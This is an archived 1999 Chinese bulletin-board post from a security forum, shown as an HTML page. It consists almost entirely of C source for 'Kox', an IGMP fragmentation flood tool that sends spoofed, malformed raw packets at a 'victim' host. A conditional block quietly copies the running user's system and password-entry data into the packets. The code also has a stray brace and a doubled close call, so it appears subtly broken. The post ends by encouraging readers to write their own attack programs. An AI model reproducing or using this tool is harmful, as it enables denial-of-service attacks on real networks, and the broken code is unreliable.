📄 360.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="310.htm">上一层</a>][<a href="361.htm">下一篇</a>]
<hr><p align="left"><small>发信人: sg (醉剑), 信区: Security <br>
标 题: 741的另一种版本 <br>
发信站: 武汉白云黄鹤站 (Mon Sep 20 22:19:20 1999), 站内信件 <br>
<br>
#include <stdio.h> <br>
#include <unistd.h> <br>
#include <stdlib.h> <br>
#include <netdb.h> <br>
#include <string.h> <br>
#include <errno.h> <br>
#include <pwd.h> <br>
#include <time.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <sys/utsname.h> <br>
#include <netinet/in.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/ip_icmp.h> <br>
#include <netinet/igmp.h> <br>
<br>
<br>
<br>
void usage(char *arg) <br>
{ <br>
printf("Kox by Coolio (coolio@k-r4d.com)\n"); <br>
printf("Usage: %s <victim>\n", arg); <br>
exit(1); <br>
} <br>
<br>
<br>
unsigned int randip() <br>
{ <br>
struct hostent *he; <br>
struct sockaddr_in sin; <br>
char *buf = (char *)calloc(1, sizeof(char) * 16); <br>
<br>
sprintf(buf, "%d.%d.%d.%d", <br>
(random()%191)+23, <br>
(random()%253)+1, <br>
(random()%253)+1, <br>
(random()%253)+1); <br>
<br>
inet_aton(buf, (struct in_addr *)&sin); <br>
return sin.sin_addr.s_addr; <br>
} <br>
} <br>
<br>
unsigned short in_cksum(unsigned short *buh, int len) <br>
{ <br>
register long sum = 0; <br>
unsigned short oddbyte; <br>
register unsigned short answer; <br>
<br>
while(len > 1) { <br>
sum += *buh++; <br>
len -= 2; <br>
} <br>
<br>
if(len == 1) { <br>
oddbyte = 0; <br>
*((unsigned char *)&oddbyte) = *(unsigned char *)buh; <br>
sum += oddbyte; <br>
} <br>
<br>
sum = (sum >> 16) + (sum & 0xFFFF); <br>
sum += (sum >> 16); <br>
answer = ~sum; <br>
return answer; <br>
} <br>
<br>
int nuke_igmp(struct sockaddr_in *victim, unsigned long spoof) <br>
{ <br>
int BIGIGMP = 1500; <br>
unsigned char *pkt; <br>
struct iphdr *ip; <br>
struct igmphdr *igmp; <br>
struct utsname *un; <br>
struct passwd *p; <br>
<br>
int i, s; <br>
int id = (random() % 40000) + 500; <br>
<br>
pkt = (unsigned char *)calloc(1, BIGIGMP); <br>
ip = (struct iphdr *)pkt; <br>
igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr)); <br>
<br>
ip->version = 4; <br>
ip->ihl = (sizeof *ip) / 4; <br>
ip->ttl = 255; <br>
ip->tot_len = htons(BIGIGMP); <br>
ip->protocol = IPPROTO_IGMP; <br>
ip->id = htons(id); <br>
ip->frag_off = htons(IP_MF); <br>
ip->saddr = spoof; <br>
ip->daddr = victim->sin_addr.s_addr; <br>
ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr)); <br>
<br>
igmp->type = 0; <br>
igmp->group = 0; <br>
igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr)); <br>
<br>
for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1; <br>
i < BIGIGMP; i++) <br>
pkt[i] = random() % 255; <br>
#ifndef I_GROK <br>
un = (struct utsname *)(pkt + sizeof(struct iphdr) + <br>
sizeof(struct igmphdr) + 40); <br>
uname(un); <br>
p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10); <br>
memcpy(p, getpwuid(getuid()), sizeof(struct passwd)); <br>
#endif <br>
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { <br>
perror("error: socket()"); <br>
return 1; <br>
} <br>
<br>
if(sendto(s, pkt, BIGIGMP, 0, victim, <br>
sizeof(struct sockaddr_in)) == -1) { <br>
perror("error: sendto()"); <br>
return 1; <br>
} <br>
usleep(1000000); <br>
<br>
for(i = 1; i < 5; i++) { <br>
if(i > 3) <br>
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3); <br>
else <br>
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF); <br>
sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in)); <br>
usleep(2000000); <br>
} <br>
<br>
free(pkt); <br>
close(s); <br>
close(s); <br>
return 0; <br>
} <br>
<br>
int main(int argc, char *argv[]) <br>
{ <br>
struct sockaddr_in victim; <br>
struct hostent *he; <br>
int i; <br>
<br>
srandom(time(NULL)); <br>
<br>
if(argc < 2) <br>
usage(argv[0]); <br>
<br>
if((he = gethostbyname(argv[1])) == NULL) { <br>
herror(argv[1]); <br>
exit(1); <br>
} <br>
memcpy(&victim.sin_addr.s_addr, he->h_addr, he->h_length); <br>
victim.sin_port = htons(0); <br>
victim.sin_family = PF_INET; <br>
<br>
printf("IGMP> "); <br>
fflush(stdout); <br>
for(i = 0; i < 10; i++) <br>
{ <br>
nuke_igmp(&victim, randip()); <br>
printf("."); <br>
fflush(stdout); <br>
} <br>
printf("\n"); <br>
fflush(stdout); <br>
} <br>
<br>
<br>
<br>
这两个程序读起来都不难懂,就不做解释了。 <br>
了解igmp的弱点之后,相信大家都可以写出一些攻击程序来。呵呵 <br>
<br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="310.htm">上一层</a>][<a href="361.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -